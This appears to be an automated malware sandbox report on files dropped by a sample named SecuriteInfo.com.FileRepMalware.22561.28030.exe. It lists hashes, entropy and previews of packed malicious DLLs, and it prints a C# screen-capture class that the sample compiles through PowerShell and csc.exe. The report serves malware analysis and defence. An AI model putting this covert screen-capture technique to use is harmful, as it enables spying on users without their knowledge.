SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
MD5:4E168CCE331E5C827D4C2B68A6200E1B
SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1532
                                                                                                                                                                                                                                  Entropy (8bit):5.058591167088024
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                                                                                                  MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                                                                                                  SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                                                                                                                                                  SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                                                                                                  SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2229248
                                                                                                                                                                                                                                  Entropy (8bit):7.999624400419257
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:49152:EbSlg7EtPbwG7Qtugc58UQG/0ym73KDYo/6cUWnyO:gSCkwG7Gub8URsF6YoPUE
                                                                                                                                                                                                                                  MD5:27BFDC1A00EB382F490991A6507CC3F2
                                                                                                                                                                                                                                  SHA1:162BC0DDF111968BFD69246660CF650F89B5B7BC
                                                                                                                                                                                                                                  SHA-256:788D5C28A70E2BC4E695C827AEC70E0869AD7BFDD1F0F4F75231D6F8D83450C2
                                                                                                                                                                                                                                  SHA-512:6FCC538C0F901F8543CF296B981A68EB6271F72DDCD106B69B45E0EBD166A355299CE23E999AA855D23EDD69F95F53B653F92772435A42C72001386CDB423899
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.b.6...6...6...?..$...&9..4...&9..2...&9..>...&9..'...}...8...Y<..5...6...2...~8..I...6.......~8..7...~8..7...Rich6...........PE..d......g.........." ...)..".......V.0wx...V...................................x...........`...........................................x.......x.............. s...............x.$...........................H.x.(.....x.@...........................................UPX0......V.............................UPX1......"...V...!.................@...UPX2..........x.......!.............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                  Entropy (8bit):7.7995124290500275
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:hPNW72j7kwZzAJh1wX7d6/FS7JFm8kzVQKScRtydjjiUBmqloARt/wy2JpUk:hPom7Hsf1wX49S7J+fyd3iUBmrARH2wk
                                                                                                                                                                                                                                  MD5:6106B4D1EEC11D2A71DEF28D2A2AFA46
                                                                                                                                                                                                                                  SHA1:E10039EFF42F88A2CD8DFE11D428C35F6178C6CE
                                                                                                                                                                                                                                  SHA-256:19B144F1BFEB38F5A88DA4471D0E9EEEFCEE979E0D574ECF13A28D06BDF7F1DA
                                                                                                                                                                                                                                  SHA-512:D08BA0CF57D533CE2DF7027158329DA66518FB1BF10220D836CE39BDF8BC0436DFC3A649CF937B3B3E2BB9FF0D3C9E964416E9AC965CFF4B24BD203067F53D43
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._5..1f..1f..1f.f..1f..0g..1f..0g..1f..4g..1f..5g..1f..2g..1f..0g..1f..0fS.1f.q9g..1f.q1g..1f.q.f..1f.q3g..1fRich..1f........................PE..d.....{e.........." ...%.........0.......@................................................`.............................................h....................p..4.......................................................@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1105816
                                                                                                                                                                                                                                  Entropy (8bit):7.937977313955466
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24576:Ak3UseOkUaIS1Ufk9yI9EBrXvkKTfropEOdo89kASpQY32Za1CPwDv3uFfJW:Ak3U0aIS1Uc9yoEZlTfMpE9lT1CPwDvX
                                                                                                                                                                                                                                  MD5:5E999BC10636935A56A26B623718D4BE
                                                                                                                                                                                                                                  SHA1:378622EB481006983F14607FDCE99641D161F244
                                                                                                                                                                                                                                  SHA-256:35460FC9FD3BAC20826A5BD7608CBE71822AC172E014A6B0E0693BD1B6E255C1
                                                                                                                                                                                                                                  SHA-512:D28ECC0F001B91C06FE4572AD18EB49CB0C81C2B3496725D69F6F82ECCD992047ECD5819E05E4F7BF786904B6C2E5D68FECC629FA50425A7D7ABD9FE33C0052A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R.m.R.m.R.m.[...@.m.0.l.P.m.0.h.^.m.0.i.Z.m.0.n.V.m.R.l..m..l.Y.m...n.O.m...i.+.m...m.S.m....S.m...o.S.m.RichR.m.........................PE..d...`.0b.........." ..............&.`D5...&..................................p7...........`......................................... h5......c5.h....`5......p2.8............h7.....................................xP5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc........`5.....................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24088
                                                                                                                                                                                                                                  Entropy (8bit):7.527291720504194
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:9RZBxuj5W4IBzuU2CUvOEvba4Za7gJXkrZRCXEpnYPLxDG4y80uzFLhHj:fwlGuUm2Evb1p07pWDG4yKRF
                                                                                                                                                                                                                                  MD5:D50EBF567149EAD9D88933561CB87D09
                                                                                                                                                                                                                                  SHA1:171DF40E4187EBBFDF9AA1D76A33F769FB8A35ED
                                                                                                                                                                                                                                  SHA-256:6AA8E12CE7C8AD52DD2E3FABEB38A726447849669C084EA63D8E322A193033AF
                                                                                                                                                                                                                                  SHA-512:7BCC9D6D3A097333E1E4B2B23C81EA1B5DB7DBDC5D9D62EBAFFB0FDFB6CFE86161520AC14DC835D1939BE22B9F342531F48DA70F765A60B8E2C3D7B9983021DE
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....@................................................................`.........................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):205216
                                                                                                                                                                                                                                  Entropy (8bit):7.9213750503510605
                                                                                                                                                                                                                                  Encrypted:false
SSDEEP:3072:74A92MK5MfGhqR1qnW/Bby+h0lE4GIp8/Mgfg68oPrRHUy1oygvaO9JSj8Hrd+/g:tSMehqKnEKlEARNYRP1lgl9jHrw/BgX
MD5:8D8D9C30250F7042D25D73B9822EFC45
SHA1:F6B83A793175E77F6E8A6ADD37204115DA8CB319
SHA-256:92BF5BDC30C53D52AB53B4F51E5F36F5B8BE1235E7929590A9FDDC86819DBA1D
SHA-512:ED40078D289B4293F4E22396F5B7D3016DAEC76A4406444CCD0A8B33D9C939A6F3274B4028B1C85914B32E69FC00C50EC9A710738746C9EE9962F86D99455BDF
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):20480
Entropy (8bit):7.615547793921446
Encrypted:false
SSDEEP:384:3fCinCNIw61COjZ0FbIj/jvIUrn+HHRCkmJeZMF50aEB1lr9Za7gJXnkg8:3a1D6vjZd1SxCjeZM0TBhpXk
MD5:7F691747CE66D3ED05A7C2C53220C8B5
SHA1:1D3F247042030CF8CF7C859002941BEBA5D15776
SHA-256:7D6472A0D7F1A0740C7FC0D0D0EA6F7C6E7CB2B11B8C623C46A6FAE1ADB4E228
SHA-512:B01F0E91039FC5B2782CAAA0B3D56D5D1FE9E94424CC536CDE9ECA73A76747736060042E345AF9EDC5EF5BF5C154705D2C2DDDF35536F305306BE25A955A9F06
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):32768
Entropy (8bit):7.775419500820849
Encrypted:false
SSDEEP:768:+aXim60eBsX5cAR0NOhDEuU8dP0LAZ2dP97MxpRz:+aXi0eB45cAASDEuNd8LAZ2p97M9
MD5:FD362FC501DDBFA28004E0D5C8DF6DD2
SHA1:7DDEF836354BEE5222C2BF65ED321E4E6254310A
SHA-256:CC2D201DFA2DFA430505E88BE8D61F69B275CB3EB27E7A32EBF2F95D890709B3
SHA-512:A9D87B27454640B8F78E934BAF0F8D4781739FC1BB6DE2B82B9AD0E11DF7ACA5D291EA6395289E4313BF5AB89225DB5EF3085C945E01DDE81BC2A73CE6591761
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):84944
Entropy (8bit):7.900884588506288
Encrypted:false
SSDEEP:1536:yIRpMj+g2d8XnyAthTgPXBgdc4dAc9RQEp3UjIpQhub7SyfA:JROKWny+ZhpR3lwIpQhubG
MD5:13DAB8A6EF861842F835940AC87A9204
SHA1:B1D0B8D080A83F11467EF23A487A2B140C5B4325
SHA-256:57A561945943DE9D06ED0A8C16699D0E28D38EC696A354FE8735A3DE6518EC0B
SHA-512:12A020130711BD17A2A1C12BEAEB239040EC17A6742382546E044155A57736BFBB8FD95D30D08FD5B52BC4488CADC149708B253006B4C2CA26F84266869FA64A
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):62416
Entropy (8bit):5.967681933111472
Encrypted:false
SSDEEP:768:pE8LeBLeeFtp5V1BfO2yvSk70QZF1nEyjnskQkr/RFB1qucwdBeCw0myou6ZwJqp:pEwewnvtjnsfw7VIpQ0h7SyH
MD5:F5CB0F83F8A825D4BEDCDDAE9D730804
SHA1:07385F55B69660B8ABC197CFAB7580072DA320EA
SHA-256:A62A9C7966CF614B3083740DC856CA9A1151DDCC0B110EBC3494799511ED392B
SHA-512:2BFA35EB4B8FFF821B4504ECCAD94ED8591EF42E0CDB39A18458395789508B4D2DA76F0DE3708D963C3187B8B1CED66B37C66834F17EECA0CEB45A62B3A69974
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1501648
Entropy (8bit):7.992072954541202
Encrypted:true
SSDEEP:24576:XAcLjAXdgziGhqsuwCejSlm5Jzq3aGemcSeQDeZWxxiFatEeZ5b/WZlfrgZthAiz:CXdgzsSCejSk5F6xeVSeQ3xxiFA35TKi
MD5:0FF261EAEC9B2A95D5A42DD14B3EBD06
SHA1:EACA11A8495D1D82754EEA1D370DB66BEEE5531A
SHA-256:D83D45DBA2DC176107A17DC5EFE8C136CAB3BACDBB42426805C1A36D78242FF3
SHA-512:04AB60E90BABBF53001CCC4FFD7E979FF450B232CBF1221731ECBE21CAB0BEE4A42C9FF6A53A5973F89B48085F797384A8D1218F34C48149C7B7D572FD8BF663
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):22480
Entropy (8bit):7.274685542334148
Encrypted:false
SSDEEP:384:TiRf5SV1a/55bjX4DjpJZa7gJXUGgIp7GY6dYIYiSy1pCQmwqhyX:TGxSVQvIDXpEGgIp7GY+BYiSyv4hI
MD5:F6CCBB8579C0A2D3AB65F62546AB9549
SHA1:9C441A78B771BD591A73AB27C6AE4A514ED356B6
SHA-256:CE958B7855D3C85127A8971CC4D9C79611402AE1E05AD6B22147E9FE084DBB08
SHA-512:04A0CEACCCE5010D233D2508E09AF531761CFE1CF2A55E531966C06BFCF4E4936B139CD9158B7BA680B795BD64A5E83D198C18A00F33771E3DC3A73008851CAE
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):626128
Entropy (8bit):7.993579504289616
Encrypted:true
SSDEEP:12288:aGzKl1BqBw166xh2tElkIExaDsI5HgIi0MRuQofTkFRjcdoPANBqwJceFBnub4pq:asKl/Ew166OtHxaDJJwZATkrcB9Jcgux
MD5:02FFE8FBACA3A8E908615C557F4DFAE3
SHA1:61DACEFBC236C99CB904ED05627EEED4FB5AB74D
                                                                                                                                                                                                                                  SHA-256:80943701E464891C4B7C9342CA3D6D8AA8D8125617C3E72C082C3FF8783F9130
                                                                                                                                                                                                                                  SHA-512:1E87843F844D4B85D688B2AAD049E941945A7E7C7D6778982BF8FAC1E8D0FEC33E63344A231A243D8C1E69C769CEF382B39311CF03ECC0732CD6FCEAFE2952F6
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.v.#..@#..@#..@*.@/..@q..A!..@q..A/..@q..A+..@q..A'..@...A ..@#..@...@...A"..@...A"..@...@"..@...A"..@Rich#..@........PE..d.....1b.........." .....@...0............................................................`..............................................!..............................................................................8...........................................UPX0....................................UPX1.....@.......<..................@....rsrc....0...........@..............@......................................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):292304
                                                                                                                                                                                                                                  Entropy (8bit):7.985311163903152
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:duh9O/bLkOHHBYCxehGZDgnhcpZJdZnHqSosSLUeBSTKxe:A6/RhYseM0nCZJdNHqCGU6STKxe
                                                                                                                                                                                                                                  MD5:135C7CDDD0C42150DCCA589716C5A20B
                                                                                                                                                                                                                                  SHA1:1546E9064CFB4AB16CD8849E06BB14E613E5CA89
                                                                                                                                                                                                                                  SHA-256:EB6B2821C9B5D4421554878C6B8CBD96ED4A23CB878FF159B37C2DDD22E43BEE
                                                                                                                                                                                                                                  SHA-512:2921538FAF85CED9DC6715865958E208BFC88E7135D5009C1D648CA4A8B3ADCD548F704A783BAD62A2AD1020F8E0859EFC664AFED3C326AFC8DED484EA907EF7
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,.$zhOJ)hOJ)hOJ)a7.)nOJ)::K(jOJ)::O(dOJ)::N(`OJ)::I(kOJ).:K(kOJ).=K(jOJ)hOK)9OJ).:G(iOJ).:J(iOJ).:.)iOJ).:H(iOJ)RichhOJ)................PE..d.....1b.........." .....P..........`U... ................................................`..........................................{..X....y.......p.......................{......................................`a..8...........................................UPX0....................................UPX1.....P... ...D..................@....rsrc........p.......H..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):41984
                                                                                                                                                                                                                                  Entropy (8bit):7.860583774596857
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:cY7iGEvYJSIlYZEVifuxMiC863eHarUVbQc3VXHxbalbo0wTMp+:F7TEvYRyZ0ifXZ8WeLVbQARb0Jw9
                                                                                                                                                                                                                                  MD5:66C8816AB9B6040ED5D45C5432F93C96
                                                                                                                                                                                                                                  SHA1:78B73258E6FFF699B8B345A54E8A7C868B10DA53
                                                                                                                                                                                                                                  SHA-256:D28D9808D80B6BEE274F7E553168B1D42AD806B9D767A92E189678BC81B329D6
                                                                                                                                                                                                                                  SHA-512:847E39AD6B490B5901E07187D6DAFA8FCC50D654AE6FAEDBEFAA9759BC328581A1D9B03F0D7B997D00C3DE1A752DE451FC91837EA4700561F93389AE10766295
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b..]&..&..&../..."..6K..$..m...$..6K..%..6K.....6K..*....%..&.....mJ..'..mJ..'..mJj.'..mJ..'..Rich&..........PE..d...r..g.........." ...).........`..@....p................................... ............`.............................................d...........................................................................@...@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
Size (bytes):1004
Entropy (8bit):4.154581034278981
Encrypted:false
SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:C76055A0388B713A1EABE16130684DC3
SHA1:EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:false
Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (610), with no line terminators
Category:dropped
Size (bytes):613
Entropy (8bit):5.350002690839074
Encrypted:false
SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ik/aNJgWZETaNJd:V3ka6KOkqeFk/aNJhETaNJd
MD5:CABE4D402C3C1C2C5AF8D9D9E5EC8EB5
SHA1:73FBD3AEABC04043B1AADDF3AA2B0D65AD6E285D
SHA-256:9DE9994020ECE35A6748AF789113029248AF304D5EF84FFF6694E2D8A9DA1D73
SHA-512:1EF28E6381E780F2335E40C75C38F7B663F24152F460FACB5FA49A21A35B655C62656B4F5235D008941A2AE26C15E14D3C36C1C21D610FAD5B9EAF399A4CD75B
Malicious:false
Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.0.cs"
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (743), with CRLF, CR line terminators
Category:dropped
Size (bytes):1164
Entropy (8bit):5.458977731279944
Encrypted:false
SSDEEP:24:KOaPsMId3ka6KOkqeFk/aNJhETaNJYKax5DqBVKVrdFAMBJTH:+Plkka6NkqeFkSJE+QK2DcVKdBJj
MD5:702B30D3330B4F90862A46B334749664
SHA1:6349A5252A1AF0C5B3960FA73AC2A0F9D93ADC12
SHA-256:020BC1798621842C7A0344EE2744080A0DFB6A4B64842F48AA662974FC7F2BA4
SHA-512:17FAB9DA58A8A428D33ADFBFE4ADC08F4E367BD17BE6742D517ABC049B28C3C0CB53C4F202E49C63BCC0C1D523FD2FB16A5AB590DD1FD1C8B0552C1F75494FBC
Malicious:false
Preview:.C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, wh
Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:data
Category:dropped
Size (bytes):32768
Entropy (8bit):0.017262956703125623
Encrypted:false
SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:false
Preview:..-.....................................8...5.....-.....................................8...5.....
Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
File Type:data
Category:dropped
Size (bytes):32768
Entropy (8bit):0.017262956703125623
Encrypted:false
SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
